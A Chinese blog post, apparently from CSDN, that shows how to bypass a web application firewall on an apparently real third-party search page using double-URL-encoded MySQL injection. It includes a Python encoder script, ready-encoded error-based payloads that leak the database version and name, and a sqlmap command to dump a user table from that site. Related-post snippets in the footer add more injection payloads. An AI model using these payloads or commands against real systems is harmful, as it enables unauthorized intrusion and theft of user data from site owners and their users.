mysql利用双重url编码绕过防火墙

最新推荐文章于 2023-11-11 15:41:06 发布
最新推荐文章于 2023-11-11 15:41:06 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: ctf的wp 文章标签: 安全 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/49187783
版权

例子:

http://www.gzidc.org/search/

post 的数据:

keyword=a

如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符

如果用双重编码的url替换注入语句那么,waf就不会拦截


下面我写了一个程序来讲普通的注入语句转换为双重url编码:


import string

payload="' and extractvalue(1, concat(0x5c,version())) #"
retVal = payload

if payload:
    retVal = ""
    i = 0

    while i < len(payload):
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1

print retVal

那么我们用的一切注入语句都可以这样表示:

比如:

' and extractvalue(1, concat(0x5c,version())) #

转换之后为:

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523

然后丢到搜索框里面,然后通过报错信息得到数据库版本号

在比如:

' and extractvalue(1, concat(0x5c,(select database()))) #
转换之后为

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2528%2573%2565%256C%2565%2563%2574%2520%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2529%2529%2529%2520%2523

就能拿到数据库的名字

愉快的注入吧


sqlmap 指令:sqlmap -u "http://www.gzidc.org/search/" --data "keyword=1" --tamper chardoubleencode -D "gzidc" -T "shl_user" --dump -v 3

niexinming
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
39-1 Web应用防火墙 - WAF应用程序层绕过
weixin_43263566的博客
05-06 93
URL编码是一种将特殊字符转为%加上其ASCII值的方式,以确保在URL中传输时不会被误解或导致错误。例如,字母"s"的URL编码是"%73"。
mysql注入绕过技术
06-04
mysql注入绕过技术
iwebsec sql-双重url编码绕过
Enrich_Life的博客
11-09 508
双重url编码,即对于浏览器发送的数据进行了两次urlencode操作,如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码,这样解码之后的数据一般不会匹配到规则,达到了bypass的效果。函数对数据又进行了一次解码,按照题目意思是需要 url 编码绕过 select ,然后假设后台有 waf ,但是 waf 一般只会解码一次,我们进行两次编码就可以执行 SQL。就没有开启这个功能,也就是说单引号和双引号等特殊字符不会被特殊处理。
URL编码绕过WAF
技术超强的网络安全平台
11-21 2055
URL编码绕过WAF 符号\进行url编码一次是%5c。 但攻击者怕这个会被认出来,所以用二次编码,把%本身编码成%25。再和后边拼成%255c。 如果URL解码器有缺陷,只不断重复“从前边开始解析”这个步骤,就会把这个先变回%5c,再变成/,出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。 抵抗父级目录回溯攻击,绝对不能依赖字符过滤,你过滤不完的。必须用“鸭子编程法”,先不论如何构造完整路径,再检验是否在有权的操作目录下。 要正确进行URL解码,谨记使用PHP等语言提供的内部函数,切勿重复发
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2816
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
CTF学习笔记12:iwebsec-SQL注入漏洞-10-双重url编码绕过
lifeng_dc的博客
01-23 1134
一、用第8题大小写绕过一样的payload就能得到结果 ?id=-1 union Select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users 二、进行一次urlencode编码来测试一下,也可以得到结果 ?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
url双重编码
詹Sir的博客
08-26 429
需求:在安卓手机上要求可以在线预览PDF文件 使用PdfJS完成需求后发现中文乱码,一顿操作都不行,最后对URL进行双重编码,成功解决问题。
修改MySQL默认字符集编码
12-14
本文将要为您介绍的是修改MySQL默认字符集编码,具体操作过程:  好记心不如烂笔头,很多东西当时没记下来,过了忘了,下次用到时又得浪费好多时间才能解决。又遇到修改MySQL默认字符集编码的问题,折腾了半天解决...
MySQL修改默认字符集编码的方法
12-16
今天又遇到修改MySQL默认字符集编码的问题,折腾了半天解决了,赶快记录下来,以后就不用每次折腾了。 查看MySQL字符集的命令是“show variables like ‘%char%’;”。 以MySQL5.6为例,默认的字符集为: 在工作...
Web应用防火墙绕过技术.pdf
11-07
此外,检测规则绕过也是常见手法,通过利用WAF规则编写不完善或覆盖不全的漏洞,如MySQL特殊字符处理的特性,来逃避检测。 在Web服务器层面上,也可以找到绕过WAF的方法。例如,在IIS服务器上,利用ASP或ASPX编程...
关于MySql链接url参数的设置
12-15
最近整理了一下网上关于MySql 链接url 参数的设置,有不正确的地方希望大家多多指教: mysql JDBC URL格式如下: jdbc:mysql://[host:port],[host:port]…/[database][?参数名1][=参数值1][&参数名2][=参数值2]… ...
MySQL注入绕开过滤的技巧总结
12-16
首先来看GIF操作: 情况一:空格被过滤 使用括号()代替空格,任何可以计算出结果的语句,都可以用括号包围起来; select * from(users)where id=1; 使用注释/**/绕过空格; select * from/**/users/**/where id=1; 情况二:限制from与某种字符组合 在from后加个点.即使用from.来代替from; select * from. users where id=1; 再直接看GIF: 说白了,就是将‘字段名 ‘替换成hex; 这里会联想到开始学SQL注入的时候,利用load_file或者into outfile
url中文乱码问题最好的解决办法-URL编码与两次encodeURI
happydecai的博客
12-19 1058
当使用地址栏提交查询参数时,如果不编码,非英文字符会按照操作系统的字符集进行编码提交到服务器,服务器会按照配置的字符集进行解码,所以如果两者不一致就会导致乱码。 encodeURI函数采用UTF-8对URL进行编码,所以如果服务器在进行解码时使用的是其他的编码方式就会出现乱码,默认的服务器配置的解码字符集都不是UTF-8,所以大部分情况下地址栏提交中文查询参数时会产生乱码;针对这
Mysql数据库手工注入-编码绕过
qq_62793621的博客
11-11 172
拒绝脚本小子,sql手工注入。
数据库语法整理及WAF绕过方式
程序员小麦的博客
06-24 1205
关系型数据库:指采用了关系模型来组织数据的数据库
sqlmap之tamper脚本
L1ni01
11-14 3164
sqlmap之tamper脚本 进行注入时,往往会遇到服务端主机装有 WAF(Web Application Firewall)对 Payload 进行过滤的情况,这使得注入攻击无法成功实施。但 WAF 往往是通过规则对攻击的 Payload 进行检测然后过滤,只要我们能绕过 WAF 的检测规则就能完成攻击。那么绕过的方法一般有哪些呢?我们可以透过 SQLMAP 中的绕过技术学习一二。 SQLMAP 中有一个 Tamper 模块专为绕过 WAF 制定特殊的 Payload,–-tamper选项可以使用加载模
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1595
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
sqlmap (六) http参数设置
hpx12345678的博客
10-06 1115
1)目的在访问需要HTTP认证的网站的时候,需要进行用户密码认证,我们直接探测会导致401错误;想要不登陆的情况下探测这个站点可以设置忽略401从而绕过继续探测;2)参数。
emoji编码表_我是谁?我在干嘛?回想被MySQL UTF8编码坑的惨痛教训总结
weixin_39626745的博客
11-22 196
最近遇到几个项目被MySQL的utf8编码坑,想起之前编码问题被坑的惨痛教训,记录一下,警示自己。曾几何时,每次建库都选utf8,觉得自己比那些用乱七八糟编码的人不知道酷到哪里去了。直到好多年前的某次课程设计做项目的时候,愉快的建了个用户表:CREATE TABLE `test_user` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `na...
mysql 绕过身份雁阵
最新发布
06-20
MySQL绕过身份验证通常指的是尝试未经授权访问MySQL数据库,这通常是非法的并且违反了数据库安全原则。如果遇到这种情况,通常有以下几种可能: 1. **弱密码或默认账户**:检查是否有使用默认或常见密码的用户,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值